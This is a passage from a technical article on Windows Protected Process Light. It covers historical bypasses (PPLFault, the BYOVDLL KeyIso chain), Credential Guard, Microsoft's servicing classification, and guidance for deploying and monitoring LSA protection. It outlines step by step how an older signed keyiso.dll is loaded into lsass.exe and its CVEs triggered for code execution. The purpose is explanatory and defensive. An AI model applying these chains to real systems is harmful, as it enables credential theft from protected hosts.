Time-of-check to time-of-use (TOCTOU): A class of bug in which a security property is verified at one point in time, but the underlying object can change between the check and the use, so the operation proceeds against the changed state without re-verification.

The TOCTOU here is subtle. When a PPL calls NtCreateSection on a Microsoft-signed DLL, the kernel's memory manager calls MiValidateSectionCreate, which calls into ci.dll to verify the file's Authenticode signature. The check succeeds. The section is created. But the memory manager does not page in the file contents at section-create time; it pages them in lazily, on demand, when threads first touch the mapped pages. If an attacker can serve the genuine file while the signature is checked and different bytes when the pages are later faulted in, the kernel will execute attacker bytes through a section whose signature it has already verified.

Landau's exploit uses Windows' CloudFilter API. An attacker holds an exclusive oplock on a Microsoft-signed DLL during the section-create signature check. After the check passes, the attacker's CloudFilter FetchDataCallback provides different bytes (the payload) when the kernel pages in the section. The PPL maps and executes the payload. Landau's Elastic post documents the chain verbatim [@elastic-pplfault]:

The internal memory manager function MiValidateSectionCreate relies on the Code Integrity module ci.dll to handle the requisite cryptography and PKI policy.

Microsoft's fix shipped in Windows Insider Canary build 25941 on September 1, 2023 [@elastic-pplfault]:

On September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941 ... Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.

The fix narrows the immediate channel by extending page-hash validation to PPL-loaded images that reside on remote (SMB redirector) paths -- the precise surface that PPLFault required to drive its CloudFilter FetchDataCallback substitution [@elastic-pplfault]. Locally-cached PPL DLL loads continue to rely on the section-create signature check, so the structural seam survives. The GA patch shipped on February 13, 2024 [@pplfault-repo]:

2024-02 UPDATE: Microsoft patched PPLFault on 2024-02-13.

Channel: a signed Microsoft DLL whose hash matched at section create. Behaviour: attacker payload mapped via the lazy page-in. For the remote-path loads PPLFault depended on, the fix narrows the channel by widening the verification surface from "the file at section-create time" to "every page at fault time." The class survives.
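The difference between checking at section create and checking at fault time fits in a few lines. In the sketch below, a hypothetical `backing_file` serves the genuine bytes on its first read and a payload on every later read, which plays the role of the attacker-controlled CloudFilter provider. FNV-1a is a toy stand-in for Authenticode and real page hashes. The whole image is hashed as one "page" for brevity.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for a cryptographic hash (FNV-1a); NOT suitable for signing. */
static uint32_t fnv1a(const unsigned char *p, size_t n)
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < n; i++) {
        h ^= p[i];
        h *= 16777619u;
    }
    return h;
}

/* A backing file whose contents change between reads. */
struct backing_file {
    const unsigned char *genuine;
    const unsigned char *payload;
    size_t len;
    int reads;
};

/* First read (the signature check) sees the genuine bytes; every later read
 * (the lazy page-in) sees the payload. */
static const unsigned char *read_file(struct backing_file *f)
{
    return f->reads++ == 0 ? f->genuine : f->payload;
}

/* Vulnerable model: verify once at section creation, then trust the page-in. */
static const unsigned char *load_check_at_create(struct backing_file *f, uint32_t signed_hash)
{
    if (fnv1a(read_file(f), f->len) != signed_hash)
        return NULL;    /* section creation refused */
    return read_file(f); /* bytes actually mapped and executed */
}

/* Fixed model: also verify the bytes at the moment they are paged in. */
static const unsigned char *load_check_at_fault(struct backing_file *f, uint32_t signed_hash)
{
    if (fnv1a(read_file(f), f->len) != signed_hash)
        return NULL;
    const unsigned char *page = read_file(f);
    return fnv1a(page, f->len) == signed_hash ? page : NULL;
}
```

The create-time loader returns the payload even though its signature check passed. The fault-time loader rejects the payload because it hashes the bytes it actually maps.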

Act IV (2022-2024) -- BYOVDLL and itm4n's KeyIso chain

BYOVDLL (Bring Your Own Vulnerable DLL) was coined by Gabriel Landau on Twitter in October 2022 (itm4n screenshots the original tweet [@itm4n-ghost-part1]; tweet status 1580067594568364032) and productised by itm4n in August 2024 in "Ghost in the PPL Part 1."

BYOVDLL: A bypass class against any signature-gated security mechanism in which the attacker loads a *legitimately signed but historically vulnerable* binary and exploits the known vulnerability inside it. The signature check passes; the vulnerability does the work. The structural property that makes the class hard to fix is that the kernel cannot deny-list legitimately signed older Microsoft DLLs without breaking the deployments that still depend on them.

itm4n's specific chain targets the CNG Key Isolation service ("KeyIso"), which runs in lsass.exe and so inherits its PPL/Lsa protection. The chain is precise [@itm4n-ghost-part1]:

As administrator, stop the KeyIso service.
Set HKLM\SYSTEM\CurrentControlSet\Services\KeyIso\Parameters\ServiceDll to point at an older keyiso.dll extracted from Microsoft update KB5023778. This DLL is Microsoft-signed; the kernel admits it.
Restart the KeyIso service. The older keyiso.dll loads into LSASS at PPL/Lsa.
Trigger CVE-2023-36906, an out-of-bounds read information disclosure in the older keyiso.dll, to leak an address.
Trigger CVE-2023-28229, which covers six use-after-free bugs in the same DLL, to obtain control of a CALL target via the RAX register.
Execute attacker code at PPL/Lsa.

The CVEs are real and tracked. k0shl's writeup is the primary root-cause analysis [@k0shl-keyiso]:

Microsoft patched vulnerabilities I reported in CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906, the CVE-2023-28229 included 6 use after free vulenrabilities with similar root cause and the CVE-2023-36906 is a out of bound read information disclosure.

NVD records both [@nvd-2023-28229] [@nvd-2023-36906]. Y3A's GitHub repository [@y3a-cve-poc] provides a public PoC for CVE-2023-28229 that itm4n's chain composes.

Channel: an actually-Microsoft-signed DLL. Behaviour: the memory-safety vulnerability inside it. No general fix has been announced. Microsoft fixed the specific CVEs by shipping a newer keyiso.dll. The older, still-signed DLL remains in circulation, because it can still be extracted from older update packages such as KB5023778. A kernel that has to admit every legitimately signed older Microsoft DLL has no general defense against the next CVE-of-the-month.

Note: BYOVDLL has no general patch. Microsoft fixes each underlying CVE on the standard cumulative-update cadence. The class persists for as long as the kernel admits older signed Microsoft DLLs into PPLs, which is for as long as legitimately deployed software depends on the older DLLs.

Figure: PPL bypass arms race (2018-2024).
2018-10: Forshaw, JScript-into-PPL. Fix: 1803 (Apr 2018), g_BlockedDllsForPPL deny-list.
2021-04: itm4n, PPLdump (KnownDlls). Fix: Jul 2022, build 19044.1826, LdrpInitializeProcess patch.
2022-09: Landau, PPLFault (TOCTOU). Fix: 13 Feb 2024 GA, CI page hashes for PPLs.
2024-08: itm4n, BYOVDLL KeyIso chain. No general fix; CVEs patched piecewise.

Act	Year	Channel verified	Behaviour exploited	Microsoft fix	Fix date
I	2018	Microsoft-signed `scrobj.dll`	JScript source executed by COM object	`g_BlockedDllsForPPL` deny-list of 5 DLLs	Apr 2018 (1803)
II	2021	`\KnownDlls\` symlink (CSRSS-blessed)	Attacker section mapped without re-validation	NTDLL `LdrpInitializeProcess` patch	Jul 2022 (19044.1826)
III	2023	Signed DLL passed `MiValidateSectionCreate`	CloudFilter substitutes bytes on lazy page-in	`/INTEGRITYCHECK` page hashes for PPLs	Feb 2024 (GA)
IV	2024	Legitimately-signed older `keyiso.dll`	Use-after-free + OOB read (CVE-2023-28229, CVE-2023-36906)	None (CVE-by-CVE)	open

Figure: itm4n's KeyIso BYOVDLL chain. Admin stops the KeyIso service -> repoints ServiceDll to the older keyiso.dll from KB5023778 -> restarts the KeyIso service -> the older keyiso.dll loads into lsass.exe at PPL/Lsa -> trigger CVE-2023-36906 (OOB read) for an info leak -> trigger CVE-2023-28229 (UAF) for RAX control -> code execution at PPL/Lsa.

itm4n explicitly attributes the BYOVDLL framing to Landau's October 2022 tweet, even though itm4n's KeyIso chain is the first public productisation. The attribution chain matters because it documents how a one-line research observation (Twitter status 1580067594568364032, screenshot preserved in [@itm4n-ghost-part1]) became a working exploit two years later. The pattern repeats in this domain: Forshaw's one-sentence DefineDosDevice comment to PPLdump (3 years); Landau's BYOVDLL tweet to itm4n's KeyIso chain (2 years). The structural class outlives its discoverer.

Four acts, one class. Every public bypass since 2018 has lived in the same narrow shape: code that becomes part of a PPL through a signed channel and executes attacker-influenced data once mapped. Each generation of fix narrows what the channel admits -- name-list five DLLs; ignore \KnownDlls\; page-hash every section; CVE-patch every vulnerable older DLL. The class survives because the kernel cannot reason about behaviour. By Rice's theorem it cannot reason about behaviour in general; in practice, it has nowhere even to start.

If lsass.exe code execution is reachable through BYOVDLL, where are the actual secrets? Not in lsass.exe. Not anywhere the kernel can read at all. The next section is the companion boundary.

9. The Companion Boundary -- Credential Guard, VBS, and `LsaIso.exe`

itm4n opens his RunAsPPL walkthrough with a warning [@itm4n-runasppl]:

I noticed that this protection tends to be confused with Credential Guard, which is completely different.

The confusion is understandable. Both run on Windows. Both protect LSASS. Both are configured by domain administrators. Both yield "ACCESS_DENIED" to Mimikatz when working correctly. They are nonetheless answering different questions, and they stack rather than replace each other.

PPL stops an administrator from reading kernel-trusted user-mode memory. It does nothing against a kernel-mode attacker who can simply zero the Protection byte in the target EPROCESS. The kernel-mode attacker is the next threat-model rung up, and the kernel-mode attacker is the threat that Credential Guard answers, by moving the credentials themselves out of lsass.exe entirely.

Virtualization-based security (VBS): A Hyper-V-based isolation regime in which the Windows hypervisor partitions the system into Virtual Trust Levels (VTLs). VTL0 contains the normal Windows kernel and user-mode processes. VTL1 contains the Secure Kernel and a small set of user-mode trustlets. Memory in VTL1 is inaccessible to VTL0, even from VTL0 kernel-mode code.

Trustlet: A user-mode process running inside VTL1. Trustlets are Microsoft-signed at a specific protected-process equivalent rung within VTL1 and serve as the user-mode hosts for VBS-isolated functionality. `LsaIso.exe` is the trustlet that holds the actual credential material on Credential Guard-enabled hosts.

The architecture is, at the highest level, three layers: VTL0 user-mode, VTL0 kernel, and VTL1 (Secure Kernel plus trustlets). On a Credential Guard-enabled host, lsass.exe still exists in VTL0 user-mode, still protects itself with PPL/Lsa, and still answers authentication requests. But it no longer holds the NTLM hashes, Kerberos TGT keys, or Cred Manager domain credentials. Those secrets live in LsaIso.exe, a trustlet in VTL1. When LSASS needs to authenticate a credential, it makes a hypercall into VTL1, and LsaIso.exe performs the cryptographic operation entirely within VTL1 memory, returning only the result. The keys never leave VTL1.
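What matters here is the shape of the interface: LSASS can ask for an operation over a credential, but never for the credential itself. The sketch below illustrates that shape only, under three assumptions:

- A toy keyed checksum, not a real MAC, stands in for the NTLM or Kerberos computation.
- File-scope `static` storage stands in for VTL1 memory.
- The function names are hypothetical.

Both halves share one file for brevity, so the C code could still reach the key. In the real system the barrier is enforced by the hypervisor, not by C linkage.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* "VTL1" half. In a real separation this would be its own component; here
 * static storage only stands in for VTL1 memory. */
static const uint8_t isolated_key[8] = {0x13, 0x37, 0xC0, 0xDE, 0x42, 0x24, 0x99, 0x01};

/* Toy keyed checksum (NOT a real MAC): mixes each message byte with the key. */
static uint32_t vtl1_keyed_op(const uint8_t *msg, size_t n)
{
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < n; i++) {
        h ^= (uint32_t)(msg[i] ^ isolated_key[i % sizeof isolated_key]);
        h *= 16777619u;
    }
    return h; /* only the result crosses back to the caller */
}

/* "VTL0" half: lsass.exe requests an operation and receives a result;
 * no function here returns or copies the key. */
static uint32_t lsass_authenticate(const uint8_t *challenge, size_t n)
{
    return vtl1_keyed_op(challenge, n); /* stands in for the call into LsaIso.exe */
}
```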

Microsoft's documentation states the threat model directly [@learn-cg]:

Credential Guard prevents credential theft attacks by protecting NTLM password hashes, Kerberos Ticket Granting Tickets (TGTs), and credentials stored by applications as domain credentials.

Credential Guard uses Virtualization-based security (VBS) to isolate secrets so that only privileged system software can access them.

Malware running in the operating system with administrative privileges can't extract secrets that are protected by VBS.

The third sentence is the load-bearing one. "Malware running with administrative privileges" covers the attacker who has already bypassed PPL and achieved code execution at PPL/Lsa: even from inside lsass.exe, the secrets are not there.

```mermaid
flowchart TD
  subgraph VTL0[VTL0 normal world]
    Admin[Admin / SYSTEM token]
    Lsass[lsass.exe at PPL/Lsa]
    Kern0[VTL0 kernel]
  end
  subgraph VTL1[VTL1 secure world]
    SK[Secure Kernel]
    Iso[LsaIso.exe trustlet]
    Secrets[NTLM hashes, Kerberos TGT keys]
  end
  Admin -- "PPL barrier (lattice)" --x Lsass
  Lsass -- hypercall --> Iso
  Kern0 -- "VBS barrier (VTL boundary)" --x Iso
  Iso --> Secrets
```

The two mechanisms stack rather than overlap. PPL prevents an admin from OpenProcess(PROCESS_VM_READ, lsass) at the user-mode lattice level. Credential Guard prevents a kernel-mode attacker who succeeds against PPL from finding the keys, because the keys are in VTL1 memory that the VTL0 kernel cannot read at all. itm4n's "complementary" framing in the RunAsPPL writeup is the right operational summary [@itm4n-runasppl]: deploy both, always both.

Note: PPL gates user-mode admins out of LSASS code memory. Credential Guard gates everything else (kernel-mode attackers, BYOVDLL execution-at-PPL/Lsa) out of the secrets themselves by moving the secrets to VTL1. Each mechanism answers a layer of the threat model the other does not.
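The layering can be written down as a toy truth table. The sketch below assumes three hypothetical attacker classes (an admin in user mode, code already executing at PPL/Lsa, and kernel-mode code) and two assets (lsass.exe process memory, and the credentials Credential Guard protects); the rules are transcribed from the prose above and are not a Windows API.

```javascript
// Toy model of the PPL + Credential Guard layering described above.
// Attacker labels, asset names and config flags are hypothetical.
const ATTACKERS = ['admin-user-mode', 'code-exec-at-ppl-lsa', 'kernel-mode'];

// Can this attacker read lsass.exe process memory?
function canReadLsassMemory(attacker, { ppl }) {
  if (attacker === 'admin-user-mode') return !ppl; // PPL blocks this read
  return true; // PPL does not stop code already at PPL/Lsa, or kernel code
}

// Can this attacker read the credentials Credential Guard protects
// (NTLM hashes, Kerberos TGT keys, domain credentials)?
function canReadProtectedCredentials(attacker, config) {
  if (config.credentialGuard) return false; // secrets live in VTL1 (LsaIso.exe)
  return canReadLsassMemory(attacker, config); // otherwise they sit in lsass.exe
}

const configs = {
  neither: { ppl: false, credentialGuard: false },
  pplOnly: { ppl: true, credentialGuard: false },
  cgOnly: { ppl: false, credentialGuard: true },
  both: { ppl: true, credentialGuard: true },
};

for (const [name, cfg] of Object.entries(configs)) {
  const memory = ATTACKERS.filter((a) => canReadLsassMemory(a, cfg));
  const creds = ATTACKERS.filter((a) => canReadProtectedCredentials(a, cfg));
  console.log(`${name}: lsass memory [${memory.join(', ')}]; ` +
              `protected credentials [${creds.join(', ')}]`);
}
```

Only the `both` row leaves the user-mode admin with no read of lsass.exe and leaves no modelled attacker with the protected credentials, which is the "always both" recommendation in miniature.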

Dimension	PPL (LSA protection)	Credential Guard
Threat model	Administrator -> user-mode LSASS	VTL0 kernel + admin -> credential material
Layer	VTL0 user-mode lattice	VTL0 / VTL1 VBS boundary
Kernel-mode attacker	Cannot stop them	Stops them (VBS-isolated memory)
MSRC classification	Defense in depth	Security boundary
Default-on (consumer)	Audit mode, Win11 22H2	n/a (enterprise)
Default-on (enterprise)	Audit mode, Win11 22H2	Enabled, Win11 22H2 / Win Server 2025 (domain-joined non-DC)

The architecture of `LsaIso.exe`, its trustlet ID, its IUM EKU, and the hypercall plumbing between LSASS and the trustlet are the subject of a separate article in this series ("VBS Trustlets: What Actually Runs in the Secure Kernel"). The cross-link is deliberate: PPL and Credential Guard are paired in practice, but the architectural depth of VTL1 is its own subject.

Credential Guard's default-on rollout, recorded in Microsoft Learn [@learn-cg]:

Starting in Windows 11, 22H2 and Windows Server 2025, Credential Guard is enabled by default on domain-joined, non-DC systems that meet hardware requirements.

Two stacked mechanisms; one classified as a security boundary, one not. The next section asks what the classification means.

10. Where PPL Isn't a Security Boundary -- Microsoft's Servicing Criteria

Gabriel Landau's "Inside Microsoft's Plan to Kill PPLFault" essay states the classification in one sentence [@elastic-pplfault]:

Microsoft does not consider PPL to be a security boundary, meaning they won't prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically addressed some such vulnerabilities on a less-urgent basis.

Microsoft's "Windows Security Servicing Criteria" defines the term security boundary directly [@msrc-servicing]:

A security boundary provides a logical separation between the code and data of security domains with different levels of trust. For example, the separation between kernel mode and user mode is a classic [...] security boundary.

Security boundary: A logical separation between code and data of security domains with different levels of trust. Microsoft commits to servicing security-boundary violations with out-of-band patches when the severity bar is met. The kernel-mode / user-mode separation is the canonical example. Per Microsoft's published servicing criteria, PPL is *not* on the security-boundary list.

Defense in depth: A security feature that raises the cost of an attack without guaranteeing prevention. Microsoft treats defense-in-depth features as servicing targets on the standard cumulative-update cadence, not as out-of-band patch priorities. PPL falls into this category per Microsoft's published classification.

The relevant excerpts of the criteria page enumerate which surfaces are and are not boundaries. The live MSRC page renders that enumeration table client-side via JavaScript; the raw HTML returned by automated fetchers contains only the React shell. The text of the enumeration is preserved in the Wayback Machine capture at archive date 2023-05-06 [@msrc-criteria-archive], and Landau's follow-on Elastic post quotes the relevant administrative-process row verbatim [@elastic-byovd-admin]:

Administrative processes and users are considered part of the Trusted Computing Base (TCB) for Windows and are therefore not strong[ly] isolated from the kernel boundary.

The corresponding row for PPL is the same shape: administrative-process-to-PPL is not isolated as a security boundary. Landau filed VULN-074311 with MSRC in September 2022 disclosing both an admin-to-PPL and a PPL-to-kernel zero-day. The Elastic post records MSRC's classification of the disclosure verbatim [@elastic-byovd-admin]:

MSRC similarly does not consider admin-to-PPL a security boundary, instead classifying it as a defense-in-depth security feature.

The MSRC servicing-criteria page's *definition* of "security boundary" is retrievable from raw HTML and verified against the live page. The *enumeration* of which Windows surfaces are or are not boundaries lives in a client-side rendered table and is not present in the raw HTML payload. The verifiable trail for "PPL is excluded from the boundary list" is the Wayback Machine capture combined with Elastic's verbatim quotation of MSRC's classification.

The operational consequence is direct. A published PPL bypass does not trigger an out-of-band patch. It is fixed on the next major-release cadence, sometimes faster if Microsoft has internal motivation. The disclosure-to-fix half-lives are public record:

Bypass	Disclosed	Microsoft fix	Disclosure-to-fix
Forshaw 2018 JScript-into-PPL	Oct 2018	Apr 2018 (1803, pre-disclosure)	~0 months (Microsoft fixed first)
itm4n 2021 PPLdump (KnownDlls)	Apr 2021	Jul 2022 (build 19044.1826)	~15 months
Landau 2023 PPLFault (CI TOCTOU)	Apr-Sep 2023	Feb 2024 (GA)	~5-11 months
itm4n 2024 BYOVDLL (KeyIso chain)	Aug 2024	none (open, CVE-by-CVE)	open

Note: A correctly classified PPL bypass is fixed on the standard cumulative-update cadence, not out-of-band. The implication for defenders is operational: PPL is exactly as strong as the engineering velocity Microsoft chooses to invest in it. Treat detection (Section 11) and the Credential Guard companion (Section 9) as load-bearing.

The reader takeaway is the third Aha moment of the article. PPL is real, kernel-enforced, structurally elegant, and demonstrably effective against the threat it was designed for (administrator-from-user-mode reads of LSASS). It is also explicitly not a security boundary per Microsoft's own published servicing policy, and that classification is the most important fact about it. Plan for bypasses. Stack with Credential Guard. Treat detection as primary, not secondary.

11. Practical Guide -- Configuring, Verifying, and Monitoring PPL

If you are deploying PPL on a corporate fleet, run this checklist. The order is deliberate: audit before you enforce, verify before you trust the verifier, and detect, because no static control survives a motivated attacker.

Deploy

Note: Enable AuditLevel = 8 under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe for two months [@learn-runasppl]. This is a different registry hive from RunAsPPL (which lives under HKLM\SYSTEM\CurrentControlSet\Control\Lsa); mixing the two values up is the most common Stage 0 deployment error (see §6). Collect CodeIntegrity events 3065 and 3066 to enumerate every LSASS plug-in that would fail enforcement (smart-card middleware, third-party CSPs, password-filter DLLs). Re-sign or replace the failing modules. Set RunAsPPL = 1 on Secure Boot-capable machines; the kernel automatically stores the policy in a UEFI variable. RunAsPPL = 2 (Win11 22H2+) is the softer option that omits the UEFI variable for environments requiring admin-removable protection.
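The two stages touch two different keys, which is exactly where the mix-up happens. A minimal sketch, assuming you stage changes as .reg text for review before importing them: the key paths and values are the ones above, while the helper name `lsaProtectionReg` and its stage labels are hypothetical.

```javascript
// Hypothetical helper that emits .reg text for the two deployment stages.
// Key paths and values come from the text; names and labels are illustrative.
const IFEO_LSASS =
  'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' +
  '\\Image File Execution Options\\LSASS.exe';
const LSA_KEY = 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa';

// .reg DWORD syntax: "dword:" followed by eight hex digits.
const dword = (n) => 'dword:' + n.toString(16).padStart(8, '0');

function lsaProtectionReg(stage) {
  const lines = ['Windows Registry Editor Version 5.00', ''];
  if (stage === 'audit') {
    // Stage 1: audit only; CodeIntegrity 3065/3066 report would-be failures.
    lines.push(`[${IFEO_LSASS}]`, `"AuditLevel"=${dword(8)}`);
  } else if (stage === 'enforce-uefi' || stage === 'enforce-no-uefi') {
    // Stage 2: RunAsPPL=1 (UEFI-backed on Secure Boot machines) or
    // RunAsPPL=2 (Win11 22H2+, no UEFI variable).
    const value = stage === 'enforce-uefi' ? 1 : 2;
    lines.push(`[${LSA_KEY}]`, `"RunAsPPL"=${dword(value)}`);
  } else {
    throw new Error(`unknown stage: ${stage}`);
  }
  return lines.join('\r\n') + '\r\n';
}

console.log(lsaProtectionReg('audit'));
```

Emitting both stages from one function keeps the two key paths side by side, which makes a value written under the wrong key easy to spot in review.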

Note: For third-party EDR, confirm the agent daemon runs at PPL/Antimalware (signer rung 3, byte 0x31). Process Explorer exposes this via View -> Select Columns -> Protection. System Informer (the modern Process Hacker fork that itm4n recommends in his BYOVDLL writeup [@itm4n-ghost-part1]) shows the same field in its process list. If your EDR is not running at PPL/Antimalware, it does not have the kernel's protection against admin tampering even when its vendor claims "protected" in marketing material. Process Explorer's "Protection" column ships in the canonical Sysinternals distribution [@sysinternals-procexp]; it reads EPROCESS.Protection via the NtQueryInformationProcess entry point [@learn-ntqueryinfoproc], although the specific ProcessProtectionInformation information-class value is not enumerated in the public Learn PROCESSINFOCLASS table -- the value is community-documented from Windows headers and reverse engineering rather than from a Microsoft Learn API reference.
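Where does 0x31 come from? The _PS_PROTECTION byte packs the protection type into bits 0-2, the audit flag into bit 3 and the signer rung into bits 4-7, the same layout the decoder in the Verify step reads. A small sketch of the encoding direction, with hypothetical helper names, shows that signer rung 3 (Antimalware) plus type 1 (ProtectedLight) yields 0x31.

```javascript
// Sketch: assemble a _PS_PROTECTION byte from its fields.
// Type in bits 0-2, Audit in bit 3, Signer in bits 4-7.
const SIGNER = Object.freeze({ Antimalware: 3, Lsa: 4, WinTcb: 6 });
const TYPE = Object.freeze({ None: 0, ProtectedLight: 1, Protected: 2 });

function encodeProtection(signer, type, audit = false) {
  if (signer < 0 || signer > 0x0f || type < 0 || type > 0x07) {
    throw new RangeError('signer must fit in 4 bits and type in 3 bits');
  }
  return (signer << 4) | ((audit ? 1 : 0) << 3) | type;
}

// The value an EDR daemon at PPL/Antimalware should report.
const expected = encodeProtection(SIGNER.Antimalware, TYPE.ProtectedLight);
console.log('0x' + expected.toString(16)); // 0x31

// Hypothetical check against a byte read from Process Explorer or WinDbg.
const isPplAntimalware = (b) => b === expected;
console.log(isPplAntimalware(0x31), isPplAntimalware(0x41)); // true false
```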

Verify

Note: On a host you suspect of misconfiguration, attach WinDbg to the kernel and run !process 0 7 lsass.exe. The output includes the _PS_PROTECTION byte. Decode it with the formula from §3 above: ((value & 0xF0) >> 4) is the signer rung; value & 0x07 is the type; (value >> 3) & 1 is the audit bit. A RunAsPPL = 1 host yields 0x41 (PPL + Lsa). The Defender service yields 0x31 (PPL + Antimalware). csrss.exe yields 0x61 (PPL + WinTcb). If lsass.exe shows 0x00, the registry policy did not take effect on this boot.

```javascript
// Decode a _PS_PROTECTION byte: Type in bits 0-2, Audit in bit 3, Signer in bits 4-7.
function decode(b) {
  const t = b & 0x07;
  const a = (b >> 3) & 0x01;
  const s = (b >> 4) & 0x0f;
  const tn = ['None', 'ProtectedLight', 'Protected'];
  // PS_PROTECTED_SIGNER values on Windows 10 and later (7 is WinSystem, 8 is App).
  const sn = ['None', 'Authenticode', 'CodeGen', 'Antimalware',
              'Lsa', 'Windows', 'WinTcb', 'WinSystem', 'App'];
  return '0x' + b.toString(16).padStart(2, '0') + ' = ' +
    (sn[s] || s) + '-' + (tn[t] || t) + (a ? ' (Audit on)' : '');
}

// Three benchmark values you should be able to recognise by sight
console.log(decode(0x31)); // MsMpEng.exe (Defender at PPL/Antimalware)
console.log(decode(0x41)); // lsass.exe under RunAsPPL=1
console.log(decode(0x61)); // csrss.exe (PPL/WinTcb)
```

Monitor

Note: The CodeIntegrity provider emits four event IDs that matter for PPL monitoring [@learn-runasppl]:

Event ID	Provider	What it tells you
3033	Microsoft-Windows-CodeIntegrity	A DLL load was blocked by CI (PPL or otherwise)
3063	Microsoft-Windows-CodeIntegrity	Enforcement mode: an LSASS plug-in failed the shared-section security requirement (the enforcement counterpart of audit-mode event 3065)
3065	Microsoft-Windows-CodeIntegrity	Audit mode: an LSASS plug-in failed the shared-section requirement
3066	Microsoft-Windows-CodeIntegrity	Audit mode: an LSASS plug-in failed the Microsoft signing-level requirement

Sysmon Event 10 (ProcessAccess) captures OpenProcess denials with the requested access mask and is the cheapest detection for a Mimikatz-shaped attempt against a RunAsPPL-protected lsass.exe. A burst of 3033 events from a non-Microsoft process targeting lsass.exe is the canonical signal that a PPL bypass attempt is under way.
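For the audit period, the useful output is a per-module list of what would fail under enforcement. A minimal sketch, assuming the CodeIntegrity events have already been exported into simple records: the record shape `{ id, imagePath }`, the helper name `triage` and the sample paths are all hypothetical, and only the four event IDs come from the table above.

```javascript
// Hypothetical triage of exported CodeIntegrity events. The record shape
// { id, imagePath } is an assumption, not the real event schema.
const AUDIT_EVENTS = new Map([
  [3065, 'shared-section requirement (audit)'],
  [3066, 'Microsoft signing level requirement (audit)'],
]);
const ENFORCEMENT_EVENTS = new Map([
  [3033, 'load blocked by Code Integrity'],
  [3063, 'shared-section requirement (enforced)'],
]);

function triage(events) {
  const toFix = new Map(); // imagePath -> Set of failure reasons
  const blocked = [];      // loads that were actually refused
  for (const ev of events) {
    if (AUDIT_EVENTS.has(ev.id)) {
      if (!toFix.has(ev.imagePath)) toFix.set(ev.imagePath, new Set());
      toFix.get(ev.imagePath).add(AUDIT_EVENTS.get(ev.id));
    } else if (ENFORCEMENT_EVENTS.has(ev.id)) {
      blocked.push({ imagePath: ev.imagePath, reason: ENFORCEMENT_EVENTS.get(ev.id) });
    }
    // Any other event ID is ignored by this sketch.
  }
  return { toFix, blocked };
}

// Hypothetical sample: module paths are invented for illustration.
const sample = [
  { id: 3066, imagePath: 'C:\\Vendor\\scmiddleware.dll' },
  { id: 3065, imagePath: 'C:\\Vendor\\scmiddleware.dll' },
  { id: 3066, imagePath: 'C:\\InHouse\\pwfilter.dll' },
  { id: 9999, imagePath: 'C:\\ignored.dll' }, // unrelated ID, skipped
];
const { toFix, blocked } = triage(sample);
for (const [path, reasons] of toFix) {
  console.log(`${path} -> ${[...reasons].join('; ')}`);
}
console.log(`blocked loads: ${blocked.length}`);
```

Every path in `toFix` is a module to re-sign or replace before switching to `RunAsPPL = 1`; a non-empty `blocked` list after the switch means something was missed.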

Note: PPL prevents admin-from-user-mode reads of LSASS. Credential Guard prevents kernel-mode reads of the credentials themselves (and BYOVDLL-style execution at PPL/Lsa). Deploy both. itm4n's "complementary" framing in his RunAsPPL writeup [@itm4n-runasppl] is the right operational model. On Win11 22H2 and Windows Server 2025, Credential Guard is default-on for domain-joined non-DC systems with VBS-capable hardware [@learn-cg]; on older fleets, enable it explicitly via Group Policy or the Device Guard / Credential Guard configuration script. Always both -- either alone leaves a layer of the threat model uncovered.

Note: If you are an EDR vendor wanting your daemon to run at PPL/Antimalware, the path is fixed [@learn-mvi] [@learn-am-services]:

1. Hold Microsoft Virus Initiative membership; maintain independent-lab certification (AV-Comparatives, AV-Test, SE Labs, MRG Effitas, SKD Labs, VB 100, West Coast Labs, AVLab Cybersecurity Foundation).
2. Author an ELAM driver with an embedded <ELAM> resource section enumerating your user-mode binary signing-certificate hashes.
3. Submit the driver through WHQL for Microsoft co-signing.
4. Use Trusted Signing for your user-mode binaries.
5. Verify with Process Explorer that the service launches at PPL/Antimalware after install.

Practitioners who follow the checklist still need to know the common misconceptions. The next section catalogues them.

12. FAQ -- Common Misconceptions

Seven questions practitioners ask after their first PPL deployment.

Does PPL stop an administrator from killing my EDR?

Yes for full-access termination via `OpenProcess(PROCESS_TERMINATE, ...)`: an admin without a higher signer rung cannot terminate a `PPL/Antimalware` daemon by a direct kill. No for legitimate uninstall: the vendor's MSI installer (or equivalent) typically signals the daemon to shut itself down through its own service-control path, which is gated by ACL and not by the PPL lattice. Operationally, expect administrators to be able to uninstall your EDR but not to terminate its main process from outside the vendor toolchain.

Is PPL the same as Credential Guard?

No. itm4n's verbatim warning is worth repeating [@itm4n-runasppl]: "I noticed that this protection tends to be confused with Credential Guard, which is completely different." PPL protects `lsass.exe` *as a process* from admin-from-user-mode reads. Credential Guard moves the *credentials themselves* into VTL1 memory via VBS. PPL is a VTL0 user-mode lattice control. Credential Guard is a VTL0 / VTL1 hypervisor boundary. They stack; see Section 9 for the layering and Section 11 Item 5 for the deployment recommendation.

Why doesn't Microsoft patch PPL bypasses out-of-band?

Because Microsoft has not classified PPL as a security boundary. The Windows Security Servicing Criteria define a security boundary as a logical separation between security domains at different levels of trust, and Microsoft's published enumeration excludes administrative-process-to-PPL from that list [@msrc-servicing] [@elastic-byovd-admin]. PPL is treated as a defense-in-depth feature. The operational implication is that PPL bypasses are fixed on the next major release cadence rather than out-of-band, with disclosure-to-fix half-lives ranging from approximately five to fifteen months historically (see Section 10 for the data).

Can my own non-AV application run as a PPL?

Practically no. The protected-process EKU OIDs are gated by Microsoft's certificate authorities; only the Antimalware rung admits third-party certificates, and admission is mediated by ELAM driver + Microsoft Virus Initiative membership [@learn-mvi]. Hobbyist tooling cannot opt in. There is no public path for a non-AV third-party application to claim a PPL rung. If your application requires PPL-style anti-tampering, the realistic options are (a) become an MVI member if your application is an AV/EDR, (b) use Process Mitigation Policies such as Code Integrity Guard for code-injection resistance, or (c) deploy your sensitive operations inside a separate Microsoft-signed service.

